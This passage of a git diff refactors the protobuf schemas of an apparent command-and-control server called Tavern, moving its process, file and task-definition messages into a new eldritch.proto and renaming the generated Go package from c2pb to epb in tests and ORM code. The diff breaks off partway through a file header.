0x6b, 0x65, 0x79, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, + 0x6b, 0x65, 0x79, 0x12, 0x14, 0x0a, 0x05, 0x76, 0x61, 0x6c, 0x75, 0x65, 0x18, 0x02, 0x20, 0x01, + 0x28, 0x09, 0x52, 0x05, 0x76, 0x61, 0x6c, 0x75, 0x65, 0x3a, 0x02, 0x38, 0x01, 0x22, 0x8b, 0x04, + 0x0a, 0x07, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x12, 0x10, 0x0a, 0x03, 0x70, 0x69, 0x64, + 0x18, 0x01, 0x20, 0x01, 0x28, 0x04, 0x52, 0x03, 0x70, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x70, + 0x70, 0x69, 0x64, 0x18, 0x02, 0x20, 0x01, 0x28, 0x04, 0x52, 0x04, 0x70, 0x70, 0x69, 0x64, 0x12, + 0x12, 0x0a, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, + 0x61, 0x6d, 0x65, 0x12, 0x1c, 0x0a, 0x09, 0x70, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, 0x6c, + 0x18, 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x70, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, + 0x6c, 0x12, 0x12, 0x0a, 0x04, 0x70, 0x61, 0x74, 0x68, 0x18, 0x05, 0x20, 0x01, 0x28, 0x09, 0x52, + 0x04, 0x70, 0x61, 0x74, 0x68, 0x12, 0x10, 0x0a, 0x03, 0x63, 0x6d, 0x64, 0x18, 0x06, 0x20, 0x01, + 0x28, 0x09, 0x52, 0x03, 0x63, 0x6d, 0x64, 0x12, 0x10, 0x0a, 0x03, 0x65, 0x6e, 0x76, 0x18, 0x07, + 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, 0x65, 0x6e, 0x76, 0x12, 0x10, 0x0a, 0x03, 0x63, 0x77, 0x64, + 0x18, 0x08, 0x20, 0x01, 0x28, 0x09, 0x52, 0x03, 0x63, 0x77, 0x64, 0x12, 0x30, 0x0a, 0x06, 0x73, + 0x74, 0x61, 0x74, 0x75, 0x73, 0x18, 0x09, 0x20, 0x01, 0x28, 0x0e, 0x32, 0x18, 0x2e, 0x65, 0x6c, + 0x64, 0x72, 0x69, 0x74, 0x63, 0x68, 0x2e, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x2e, 0x53, + 0x74, 0x61, 0x74, 0x75, 0x73, 0x52, 0x06, 0x73, 0x74, 0x61, 0x74, 0x75, 0x73, 0x22, 0xab, 0x02, + 0x0a, 0x06, 0x53, 0x74, 0x61, 0x74, 0x75, 0x73, 0x12, 0x16, 0x0a, 0x12, 0x53, 0x54, 0x41, 0x54, + 0x55, 0x53, 0x5f, 0x55, 0x4e, 0x53, 0x50, 0x45, 0x43, 0x49, 0x46, 0x49, 0x45, 0x44, 0x10, 0x00, + 0x12, 0x12, 0x0a, 0x0e, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x55, 0x4e, 0x4b, 0x4e, 0x4f, + 0x57, 0x4e, 0x10, 0x01, 0x12, 0x0f, 0x0a, 0x0b, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x49, + 0x44, 0x4c, 0x45, 0x10, 0x02, 0x12, 0x0e, 0x0a, 0x0a, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, + 0x52, 0x55, 0x4e, 0x10, 0x03, 0x12, 0x10, 0x0a, 0x0c, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, + 0x53, 0x4c, 0x45, 0x45, 0x50, 0x10, 0x04, 0x12, 0x0f, 0x0a, 0x0b, 0x53, 0x54, 0x41, 0x54, 0x55, + 0x53, 0x5f, 0x53, 0x54, 0x4f, 0x50, 0x10, 0x05, 0x12, 0x11, 0x0a, 0x0d, 0x53, 0x54, 0x41, 0x54, + 0x55, 0x53, 0x5f, 0x5a, 0x4f, 0x4d, 0x42, 0x49, 0x45, 0x10, 0x06, 0x12, 0x12, 0x0a, 0x0e, 0x53, + 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x54, 0x52, 0x41, 0x43, 0x49, 0x4e, 0x47, 0x10, 0x07, 0x12, + 0x0f, 0x0a, 0x0b, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x44, 0x45, 0x41, 0x44, 0x10, 0x08, + 0x12, 0x14, 0x0a, 0x10, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x57, 0x41, 0x4b, 0x45, 0x5f, + 0x4b, 0x49, 0x4c, 0x4c, 0x10, 0x09, 0x12, 0x11, 0x0a, 0x0d, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, + 0x5f, 0x57, 0x41, 0x4b, 0x49, 0x4e, 0x47, 0x10, 0x0a, 0x12, 0x11, 0x0a, 0x0d, 0x53, 0x54, 0x41, + 0x54, 0x55, 0x53, 0x5f, 0x50, 0x41, 0x52, 0x4b, 0x45, 0x44, 0x10, 0x0b, 0x12, 0x17, 0x0a, 0x13, + 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, 0x4c, 0x4f, 0x43, 0x4b, 0x5f, 0x42, 0x4c, 0x4f, 0x43, + 0x4b, 0x45, 0x44, 0x10, 0x0c, 0x12, 0x24, 0x0a, 0x20, 0x53, 0x54, 0x41, 0x54, 0x55, 0x53, 0x5f, + 0x55, 0x4e, 0x49, 0x4e, 0x54, 0x45, 0x52, 0x55, 0x50, 0x54, 0x49, 0x42, 0x4c, 0x45, 0x5f, 0x44, + 0x49, 0x53, 0x4b, 0x5f, 0x53, 0x4c, 0x45, 0x45, 0x50, 0x10, 0x0d, 0x22, 0x34, 0x0a, 0x0b, 0x50, + 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x4c, 0x69, 0x73, 0x74, 0x12, 0x25, 0x0a, 0x04, 0x6c, 0x69, + 0x73, 0x74, 0x18, 0x01, 0x20, 0x03, 0x28, 0x0b, 0x32, 0x11, 0x2e, 0x65, 0x6c, 0x64, 0x72, 0x69, + 0x74, 0x63, 0x68, 0x2e, 0x50, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x52, 0x04, 0x6c, 0x69, 0x73, + 0x74, 0x22, 0xb6, 0x01, 0x0a, 0x04, 0x46, 0x69, 0x6c, 0x65, 0x12, 0x12, 0x0a, 0x04, 0x70, 0x61, + 0x74, 0x68, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x70, 0x61, 0x74, 0x68, 0x12, 0x14, + 0x0a, 0x05, 0x6f, 0x77, 0x6e, 0x65, 0x72, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, 0x6f, + 0x77, 0x6e, 0x65, 0x72, 0x12, 0x14, 0x0a, 0x05, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x18, 0x03, 0x20, + 0x01, 0x28, 0x09, 0x52, 0x05, 0x67, 0x72, 0x6f, 0x75, 0x70, 0x12, 0x20, 0x0a, 0x0b, 0x70, 0x65, + 0x72, 0x6d, 0x69, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x73, 0x18, 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, + 0x0b, 0x70, 0x65, 0x72, 0x6d, 0x69, 0x73, 0x73, 0x69, 0x6f, 0x6e, 0x73, 0x12, 0x12, 0x0a, 0x04, + 0x73, 0x69, 0x7a, 0x65, 0x18, 0x05, 0x20, 0x01, 0x28, 0x03, 0x52, 0x04, 0x73, 0x69, 0x7a, 0x65, + 0x12, 0x22, 0x0a, 0x0d, 0x73, 0x68, 0x61, 0x33, 0x5f, 0x32, 0x35, 0x36, 0x5f, 0x68, 0x61, 0x73, + 0x68, 0x18, 0x06, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0b, 0x73, 0x68, 0x61, 0x33, 0x32, 0x35, 0x36, + 0x48, 0x61, 0x73, 0x68, 0x12, 0x14, 0x0a, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x18, 0x07, 0x20, + 0x01, 0x28, 0x0c, 0x52, 0x05, 0x63, 0x68, 0x75, 0x6e, 0x6b, 0x42, 0x22, 0x5a, 0x20, 0x72, 0x65, + 0x61, 0x6c, 0x6d, 0x2e, 0x70, 0x75, 0x62, 0x2f, 0x74, 0x61, 0x76, 0x65, 0x72, 0x6e, 0x2f, 0x69, + 0x6e, 0x74, 0x65, 0x72, 0x6e, 0x61, 0x6c, 0x2f, 0x63, 0x32, 0x2f, 0x65, 0x70, 0x62, 0x62, 0x06, + 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x33, +} + +var ( + file_eldritch_proto_rawDescOnce sync.Once + file_eldritch_proto_rawDescData = file_eldritch_proto_rawDesc +) + +func file_eldritch_proto_rawDescGZIP() []byte { + file_eldritch_proto_rawDescOnce.Do(func() { + file_eldritch_proto_rawDescData = protoimpl.X.CompressGZIP(file_eldritch_proto_rawDescData) + }) + return file_eldritch_proto_rawDescData +} + +var file_eldritch_proto_enumTypes = make([]protoimpl.EnumInfo, 1) +var file_eldritch_proto_msgTypes = make([]protoimpl.MessageInfo, 5) +var file_eldritch_proto_goTypes = []interface{}{ + (Process_Status)(0), // 0: eldritch.Process.Status + (*Tome)(nil), // 1: eldritch.Tome + (*Process)(nil), // 2: eldritch.Process + (*ProcessList)(nil), // 3: eldritch.ProcessList + (*File)(nil), // 4: eldritch.File + nil, // 5: eldritch.Tome.ParametersEntry +} +var file_eldritch_proto_depIdxs = []int32{ + 5, // 0: eldritch.Tome.parameters:type_name -> eldritch.Tome.ParametersEntry + 0, // 1: eldritch.Process.status:type_name -> eldritch.Process.Status + 2, // 2: eldritch.ProcessList.list:type_name -> eldritch.Process + 3, // [3:3] is the sub-list for method output_type + 3, // [3:3] is the sub-list for method input_type + 3, // [3:3] is the sub-list for extension type_name + 3, // [3:3] is the sub-list for extension extendee + 0, // [0:3] is the sub-list for field type_name +} + +func init() { file_eldritch_proto_init() } +func file_eldritch_proto_init() { + if File_eldritch_proto != nil { + return + } + if !protoimpl.UnsafeEnabled { + file_eldritch_proto_msgTypes[0].Exporter = func(v interface{}, i int) interface{} { + switch v := v.(*Tome); i { + case 0: + return &v.state + case 1: + return &v.sizeCache + case 2: + return &v.unknownFields + default: + return nil + } + } + file_eldritch_proto_msgTypes[1].Exporter = func(v interface{}, i int) interface{} { + switch v := v.(*Process); i { + case 0: + return &v.state + case 1: + return &v.sizeCache + case 2: + return &v.unknownFields + default: + return nil + } + } + file_eldritch_proto_msgTypes[2].Exporter = func(v interface{}, i int) interface{} { + switch v := v.(*ProcessList); i { + case 0: + return &v.state + case 1: + return &v.sizeCache + case 2: + return &v.unknownFields + default: + return nil + } + } + file_eldritch_proto_msgTypes[3].Exporter = func(v interface{}, i int) interface{} { + switch v := v.(*File); i { + case 0: + return &v.state + case 1: + return &v.sizeCache + case 2: + return &v.unknownFields + default: + return nil + } + } + } + type x struct{} + out := protoimpl.TypeBuilder{ + File: protoimpl.DescBuilder{ + GoPackagePath: reflect.TypeOf(x{}).PkgPath(), + RawDescriptor: file_eldritch_proto_rawDesc, + NumEnums: 1, + NumMessages: 5, + NumExtensions: 0, + NumServices: 0, + }, + GoTypes: file_eldritch_proto_goTypes, + DependencyIndexes: file_eldritch_proto_depIdxs, + EnumInfos: file_eldritch_proto_enumTypes, + MessageInfos: file_eldritch_proto_msgTypes, + }.Build() + File_eldritch_proto = out.File + file_eldritch_proto_rawDesc = nil + file_eldritch_proto_goTypes = nil + file_eldritch_proto_depIdxs = nil +} diff --git a/tavern/internal/c2/c2pb/enum_process_status.go b/tavern/internal/c2/epb/enum_process_status.go similarity index 99% rename from tavern/internal/c2/c2pb/enum_process_status.go rename to tavern/internal/c2/epb/enum_process_status.go index 2291531df..011378254 100644 --- a/tavern/internal/c2/c2pb/enum_process_status.go +++ b/tavern/internal/c2/epb/enum_process_status.go @@ -1,4 +1,4 @@ -package c2pb +package epb import ( "database/sql/driver" diff --git a/tavern/internal/c2/c2pb/enum_process_status_test.go b/tavern/internal/c2/epb/enum_process_status_test.go similarity index 58% rename from tavern/internal/c2/c2pb/enum_process_status_test.go rename to tavern/internal/c2/epb/enum_process_status_test.go index b4c44a00b..91ce0fb8b 100644 --- a/tavern/internal/c2/c2pb/enum_process_status_test.go +++ b/tavern/internal/c2/epb/enum_process_status_test.go @@ -1,4 +1,4 @@ -package c2pb_test +package epb_test import ( "bytes" @@ -6,68 +6,68 @@ import ( "github.com/stretchr/testify/assert" "github.com/stretchr/testify/require" - "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" ) func TestProcessStatusValues(t *testing.T) { - assert.NotEmpty(t, c2pb.Process_Status(0).Values()) + assert.NotEmpty(t, epb.Process_Status(0).Values()) } func TestProcessStatusValue(t *testing.T) { - val, err := c2pb.Process_Status(0).Value() + val, err := epb.Process_Status(0).Value() require.NoError(t, err) require.NotNil(t, val) } func TestProcessStatusMarshalGraphQL(t *testing.T) { var buf bytes.Buffer - c2pb.Process_Status(0).MarshalGQL(&buf) + epb.Process_Status(0).MarshalGQL(&buf) assert.Equal(t, `"STATUS_UNSPECIFIED"`, buf.String()) } func TestProcessStatusUnmarshalGraphQL(t *testing.T) { - var status c2pb.Process_Status - assert.NoError(t, (*c2pb.Process_Status).UnmarshalGQL(&status, `STATUS_IDLE`)) - assert.Equal(t, c2pb.Process_STATUS_IDLE, status) + var status epb.Process_Status + assert.NoError(t, (*epb.Process_Status).UnmarshalGQL(&status, `STATUS_IDLE`)) + assert.Equal(t, epb.Process_STATUS_IDLE, status) } func TestProcessStatusScan(t *testing.T) { tests := []struct { name string scanVal any - wantStatus c2pb.Process_Status + wantStatus epb.Process_Status }{ { name: "RUN_String", scanVal: "STATUS_RUN", - wantStatus: c2pb.Process_STATUS_RUN, + wantStatus: epb.Process_STATUS_RUN, }, { name: "IDLE_[]uint8", scanVal: []uint8("STATUS_IDLE"), - wantStatus: c2pb.Process_STATUS_IDLE, + wantStatus: epb.Process_STATUS_IDLE, }, { name: "Invalid", scanVal: "NOT_A_STATUS", - wantStatus: c2pb.Process_STATUS_UNKNOWN, + wantStatus: epb.Process_STATUS_UNKNOWN, }, { name: "Empty", scanVal: "", - wantStatus: c2pb.Process_STATUS_UNSPECIFIED, + wantStatus: epb.Process_STATUS_UNSPECIFIED, }, { name: "Nil", scanVal: nil, - wantStatus: c2pb.Process_STATUS_UNSPECIFIED, + wantStatus: epb.Process_STATUS_UNSPECIFIED, }, } for _, tc := range tests { t.Run(tc.name, func(t *testing.T) { - status := c2pb.Process_Status(0) - err := (*c2pb.Process_Status).Scan(&status, tc.scanVal) + status := epb.Process_Status(0) + err := (*epb.Process_Status).Scan(&status, tc.scanVal) assert.NoError(t, err) assert.Equal(t, tc.wantStatus, status) }) diff --git a/tavern/internal/c2/generate.go b/tavern/internal/c2/generate.go index 60a953447..d8238b97c 100644 --- a/tavern/internal/c2/generate.go +++ b/tavern/internal/c2/generate.go @@ -1,3 +1,4 @@ package c2 -//go:generate protoc --go_out=./c2pb --go_opt=paths=source_relative --go-grpc_out=./c2pb --go-grpc_opt=paths=source_relative c2.proto +//go:generate protoc -I=./proto --go_out=./epb --go_opt=paths=source_relative --go-grpc_out=./epb --go-grpc_opt=paths=source_relative eldritch.proto +//go:generate protoc -I=./proto --go_out=./c2pb --go_opt=paths=source_relative --go-grpc_out=./c2pb --go-grpc_opt=paths=source_relative c2.proto diff --git a/tavern/internal/c2/c2.proto b/tavern/internal/c2/proto/c2.proto similarity index 76% rename from tavern/internal/c2/c2.proto rename to tavern/internal/c2/proto/c2.proto index 86c19c7d2..4699e6909 100644 --- a/tavern/internal/c2/c2.proto +++ b/tavern/internal/c2/proto/c2.proto @@ -3,9 +3,10 @@ syntax = "proto3"; package c2; -option go_package = "github.com/kcarretto/tavern/internal/c2/c2pb"; +option go_package = "realm.pub/tavern/internal/c2/c2pb"; import "google/protobuf/timestamp.proto"; +import "eldritch.proto"; /* * Messages @@ -42,45 +43,12 @@ message Host { string primary_ip = 4; } -// Process running on the host system. -message Process { - uint64 pid = 1; - uint64 ppid = 2; - string name = 3; - string principal = 4; - - string path = 5; - string cmd = 6; - string env = 7; - string cwd = 8; - - enum Status { - STATUS_UNSPECIFIED = 0; - STATUS_UNKNOWN = 1; - STATUS_IDLE = 2; - STATUS_RUN = 3; - STATUS_SLEEP = 4; - STATUS_STOP = 5; - STATUS_ZOMBIE = 6; - STATUS_TRACING = 7; - STATUS_DEAD = 8; - STATUS_WAKE_KILL = 9; - STATUS_WAKING = 10; - STATUS_PARKED = 11; - STATUS_LOCK_BLOCKED = 12; - STATUS_UNINTERUPTIBLE_DISK_SLEEP = 13; - } - Status status = 9; -} - // Task instructions for the beacon to execute. message Task { int64 id = 1; - string eldritch = 2; - map parameters = 3; - repeated string file_names = 4; - string quest_name = 5; + eldritch.Tome tome = 2; + string quest_name = 3; } // TaskError provides information when task execution fails. @@ -121,20 +89,14 @@ message DownloadFileResponse { message ReportFileRequest { int64 task_id = 1; - string path = 2; - string owner = 3; - string group = 4; - string permissions = 5; - int64 size = 6; - string sha3_256_hash = 7; - - bytes chunk = 8; + eldritch.File chunk = 2; + } message ReportFileResponse {} message ReportProcessListRequest { - repeated Process list = 1; - int64 task_id = 2; + int64 task_id = 1; + eldritch.ProcessList list = 2; } message ReportProcessListResponse {} diff --git a/tavern/internal/c2/proto/eldritch.proto b/tavern/internal/c2/proto/eldritch.proto new file mode 100644 index 000000000..390e31507 --- /dev/null +++ b/tavern/internal/c2/proto/eldritch.proto @@ -0,0 +1,61 @@ +syntax = "proto3"; +// edition = "2023"; + +package eldritch; + +option go_package = "realm.pub/tavern/internal/c2/epb"; + +// Tome for eldritch to execute. +message Tome { + string eldritch = 1; + map parameters = 2; + repeated string file_names = 3; +} + +// Process running on the host system. +message Process { + uint64 pid = 1; + uint64 ppid = 2; + string name = 3; + string principal = 4; + + string path = 5; + string cmd = 6; + string env = 7; + string cwd = 8; + + enum Status { + STATUS_UNSPECIFIED = 0; + STATUS_UNKNOWN = 1; + STATUS_IDLE = 2; + STATUS_RUN = 3; + STATUS_SLEEP = 4; + STATUS_STOP = 5; + STATUS_ZOMBIE = 6; + STATUS_TRACING = 7; + STATUS_DEAD = 8; + STATUS_WAKE_KILL = 9; + STATUS_WAKING = 10; + STATUS_PARKED = 11; + STATUS_LOCK_BLOCKED = 12; + STATUS_UNINTERUPTIBLE_DISK_SLEEP = 13; + } + Status status = 9; +} + +// ProcessList of running processes on the host system. +message ProcessList { + repeated Process list = 1; +} + +// File on the host system. +message File { + string path = 1; + string owner = 2; + string group = 3; + string permissions = 4; + int64 size = 5; + string sha3_256_hash = 6; + + bytes chunk = 7; +} diff --git a/tavern/internal/ent/gql_where_input.go b/tavern/internal/ent/gql_where_input.go index e2c95f701..3f00e6d07 100644 --- a/tavern/internal/ent/gql_where_input.go +++ b/tavern/internal/ent/gql_where_input.go @@ -8,6 +8,7 @@ import ( "time" "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent/beacon" "realm.pub/tavern/internal/ent/file" "realm.pub/tavern/internal/ent/host" @@ -2175,10 +2176,10 @@ type HostProcessWhereInput struct { CwdContainsFold *string `json:"cwdContainsFold,omitempty"` // "status" field predicates. - Status *c2pb.Process_Status `json:"status,omitempty"` - StatusNEQ *c2pb.Process_Status `json:"statusNEQ,omitempty"` - StatusIn []c2pb.Process_Status `json:"statusIn,omitempty"` - StatusNotIn []c2pb.Process_Status `json:"statusNotIn,omitempty"` + Status *epb.Process_Status `json:"status,omitempty"` + StatusNEQ *epb.Process_Status `json:"statusNEQ,omitempty"` + StatusIn []epb.Process_Status `json:"statusIn,omitempty"` + StatusNotIn []epb.Process_Status `json:"statusNotIn,omitempty"` // "host" edge predicates. HasHost *bool `json:"hasHost,omitempty"` diff --git a/tavern/internal/ent/host/host.go b/tavern/internal/ent/host/host.go index 1887e910d..cdc2ba182 100644 --- a/tavern/internal/ent/host/host.go +++ b/tavern/internal/ent/host/host.go @@ -113,7 +113,7 @@ var ( // PlatformValidator is a validator for the "platform" field enum values. It is called by the builders before save. func PlatformValidator(pl c2pb.Host_Platform) error { switch pl.String() { - case "PLATFORM_BSD", "PLATFORM_UNSPECIFIED", "PLATFORM_WINDOWS", "PLATFORM_LINUX", "PLATFORM_MACOS": + case "PLATFORM_UNSPECIFIED", "PLATFORM_WINDOWS", "PLATFORM_LINUX", "PLATFORM_MACOS", "PLATFORM_BSD": return nil default: return fmt.Errorf("host: invalid enum value for platform field: %q", pl) diff --git a/tavern/internal/ent/hostprocess.go b/tavern/internal/ent/hostprocess.go index 4897df7ef..5879dde67 100644 --- a/tavern/internal/ent/hostprocess.go +++ b/tavern/internal/ent/hostprocess.go @@ -9,7 +9,7 @@ import ( "entgo.io/ent" "entgo.io/ent/dialect/sql" - "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent/host" "realm.pub/tavern/internal/ent/hostprocess" "realm.pub/tavern/internal/ent/task" @@ -41,7 +41,7 @@ type HostProcess struct { // The current working directory for the process. Cwd string `json:"cwd,omitempty"` // Current process status. - Status c2pb.Process_Status `json:"status,omitempty"` + Status epb.Process_Status `json:"status,omitempty"` // Edges holds the relations/edges for other nodes in the graph. // The values are being populated by the HostProcessQuery when eager-loading is set. Edges HostProcessEdges `json:"edges"` @@ -96,7 +96,7 @@ func (*HostProcess) scanValues(columns []string) ([]any, error) { for i := range columns { switch columns[i] { case hostprocess.FieldStatus: - values[i] = new(c2pb.Process_Status) + values[i] = new(epb.Process_Status) case hostprocess.FieldID, hostprocess.FieldPid, hostprocess.FieldPpid: values[i] = new(sql.NullInt64) case hostprocess.FieldName, hostprocess.FieldPrincipal, hostprocess.FieldPath, hostprocess.FieldCmd, hostprocess.FieldEnv, hostprocess.FieldCwd: @@ -191,7 +191,7 @@ func (hp *HostProcess) assignValues(columns []string, values []any) error { hp.Cwd = value.String } case hostprocess.FieldStatus: - if value, ok := values[i].(*c2pb.Process_Status); !ok { + if value, ok := values[i].(*epb.Process_Status); !ok { return fmt.Errorf("unexpected type %T for field status", values[i]) } else if value != nil { hp.Status = *value diff --git a/tavern/internal/ent/hostprocess/hostprocess.go b/tavern/internal/ent/hostprocess/hostprocess.go index c16a644cb..bc94c0e22 100644 --- a/tavern/internal/ent/hostprocess/hostprocess.go +++ b/tavern/internal/ent/hostprocess/hostprocess.go @@ -9,7 +9,7 @@ import ( "entgo.io/ent/dialect/sql" "entgo.io/ent/dialect/sql/sqlgraph" "github.com/99designs/gqlgen/graphql" - "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" ) const ( @@ -112,9 +112,9 @@ var ( ) // StatusValidator is a validator for the "status" field enum values. It is called by the builders before save. -func StatusValidator(s c2pb.Process_Status) error { +func StatusValidator(s epb.Process_Status) error { switch s.String() { - case "STATUS_STOP", "STATUS_TRACING", "STATUS_WAKE_KILL", "STATUS_UNKNOWN", "STATUS_IDLE", "STATUS_SLEEP", "STATUS_WAKING", "STATUS_UNSPECIFIED", "STATUS_PARKED", "STATUS_LOCK_BLOCKED", "STATUS_DEAD", "STATUS_ZOMBIE", "STATUS_UNINTERUPTIBLE_DISK_SLEEP", "STATUS_RUN": + case "STATUS_IDLE", "STATUS_STOP", "STATUS_ZOMBIE", "STATUS_LOCK_BLOCKED", "STATUS_UNSPECIFIED", "STATUS_PARKED", "STATUS_RUN", "STATUS_DEAD", "STATUS_UNINTERUPTIBLE_DISK_SLEEP", "STATUS_UNKNOWN", "STATUS_SLEEP", "STATUS_TRACING", "STATUS_WAKE_KILL", "STATUS_WAKING": return nil default: return fmt.Errorf("hostprocess: invalid enum value for status field: %q", s) @@ -213,8 +213,8 @@ func newTaskStep() *sqlgraph.Step { } var ( - // c2pb.Process_Status must implement graphql.Marshaler. - _ graphql.Marshaler = (*c2pb.Process_Status)(nil) - // c2pb.Process_Status must implement graphql.Unmarshaler. - _ graphql.Unmarshaler = (*c2pb.Process_Status)(nil) + // epb.Process_Status must implement graphql.Marshaler. + _ graphql.Marshaler = (*epb.Process_Status)(nil) + // epb.Process_Status must implement graphql.Unmarshaler. + _ graphql.Unmarshaler = (*epb.Process_Status)(nil) ) diff --git a/tavern/internal/ent/hostprocess/where.go b/tavern/internal/ent/hostprocess/where.go index 1700050f4..000a3cd4b 100644 --- a/tavern/internal/ent/hostprocess/where.go +++ b/tavern/internal/ent/hostprocess/where.go @@ -7,7 +7,7 @@ import ( "entgo.io/ent/dialect/sql" "entgo.io/ent/dialect/sql/sqlgraph" - "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent/predicate" ) @@ -697,22 +697,22 @@ func CwdContainsFold(v string) predicate.HostProcess { } // StatusEQ applies the EQ predicate on the "status" field. -func StatusEQ(v c2pb.Process_Status) predicate.HostProcess { +func StatusEQ(v epb.Process_Status) predicate.HostProcess { return predicate.HostProcess(sql.FieldEQ(FieldStatus, v)) } // StatusNEQ applies the NEQ predicate on the "status" field. -func StatusNEQ(v c2pb.Process_Status) predicate.HostProcess { +func StatusNEQ(v epb.Process_Status) predicate.HostProcess { return predicate.HostProcess(sql.FieldNEQ(FieldStatus, v)) } // StatusIn applies the In predicate on the "status" field. -func StatusIn(vs ...c2pb.Process_Status) predicate.HostProcess { +func StatusIn(vs ...epb.Process_Status) predicate.HostProcess { return predicate.HostProcess(sql.FieldIn(FieldStatus, vs...)) } // StatusNotIn applies the NotIn predicate on the "status" field. -func StatusNotIn(vs ...c2pb.Process_Status) predicate.HostProcess { +func StatusNotIn(vs ...epb.Process_Status) predicate.HostProcess { return predicate.HostProcess(sql.FieldNotIn(FieldStatus, vs...)) } diff --git a/tavern/internal/ent/hostprocess_create.go b/tavern/internal/ent/hostprocess_create.go index 7fda213d8..c30b0201e 100644 --- a/tavern/internal/ent/hostprocess_create.go +++ b/tavern/internal/ent/hostprocess_create.go @@ -11,7 +11,7 @@ import ( "entgo.io/ent/dialect/sql" "entgo.io/ent/dialect/sql/sqlgraph" "entgo.io/ent/schema/field" - "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent/host" "realm.pub/tavern/internal/ent/hostprocess" "realm.pub/tavern/internal/ent/task" @@ -134,8 +134,8 @@ func (hpc *HostProcessCreate) SetNillableCwd(s *string) *HostProcessCreate { } // SetStatus sets the "status" field. -func (hpc *HostProcessCreate) SetStatus(cs c2pb.Process_Status) *HostProcessCreate { - hpc.mutation.SetStatus(cs) +func (hpc *HostProcessCreate) SetStatus(es epb.Process_Status) *HostProcessCreate { + hpc.mutation.SetStatus(es) return hpc } @@ -547,7 +547,7 @@ func (u *HostProcessUpsert) ClearCwd() *HostProcessUpsert { } // SetStatus sets the "status" field. -func (u *HostProcessUpsert) SetStatus(v c2pb.Process_Status) *HostProcessUpsert { +func (u *HostProcessUpsert) SetStatus(v epb.Process_Status) *HostProcessUpsert { u.Set(hostprocess.FieldStatus, v) return u } @@ -772,7 +772,7 @@ func (u *HostProcessUpsertOne) ClearCwd() *HostProcessUpsertOne { } // SetStatus sets the "status" field. -func (u *HostProcessUpsertOne) SetStatus(v c2pb.Process_Status) *HostProcessUpsertOne { +func (u *HostProcessUpsertOne) SetStatus(v epb.Process_Status) *HostProcessUpsertOne { return u.Update(func(s *HostProcessUpsert) { s.SetStatus(v) }) @@ -1165,7 +1165,7 @@ func (u *HostProcessUpsertBulk) ClearCwd() *HostProcessUpsertBulk { } // SetStatus sets the "status" field. -func (u *HostProcessUpsertBulk) SetStatus(v c2pb.Process_Status) *HostProcessUpsertBulk { +func (u *HostProcessUpsertBulk) SetStatus(v epb.Process_Status) *HostProcessUpsertBulk { return u.Update(func(s *HostProcessUpsert) { s.SetStatus(v) }) diff --git a/tavern/internal/ent/hostprocess_update.go b/tavern/internal/ent/hostprocess_update.go index ae271a9df..4ff17eeab 100644 --- a/tavern/internal/ent/hostprocess_update.go +++ b/tavern/internal/ent/hostprocess_update.go @@ -11,7 +11,7 @@ import ( "entgo.io/ent/dialect/sql" "entgo.io/ent/dialect/sql/sqlgraph" "entgo.io/ent/schema/field" - "realm.pub/tavern/internal/c2/c2pb" + "realm.pub/tavern/internal/c2/epb" "realm.pub/tavern/internal/ent/host" "realm.pub/tavern/internal/ent/hostprocess" "realm.pub/tavern/internal/ent/predicate" @@ -156,8 +156,8 @@ func (hpu *HostProcessUpdate) ClearCwd() *HostProcessUpdate { } // SetStatus sets the "status" field. -func (hpu *HostProcessUpdate) SetStatus(cs c2pb.Process_Status) *HostProcessUpdate { - hpu.mutation.SetStatus(cs) +func (hpu *HostProcessUpdate) SetStatus(es epb.Process_Status) *HostProcessUpdate { + hpu.mutation.SetStatus(es) return hpu } @@ -520,8 +520,8 @@ func (hpuo *HostProcessUpdateOne) ClearCwd() *HostProcessUpdateOne { } // SetStatus sets the "status" field. -func (hpuo *HostProcessUpdateOne) SetStatus(cs c2pb.Process_Status) *HostProcessUpdateOne { - hpuo.mutation.SetStatus(cs) +func (hpuo *HostProcessUpdateOne) SetStatus(es epb.Process_Status) *HostProcessUpdateOne { + hpuo.mutation.SetStatus(es) return hpuo } diff --git a/tavern/internal/ent/migrate/schema.go b/tavern/internal/ent/migrate/schema.go index 2134af139..38208e395 100644 --- 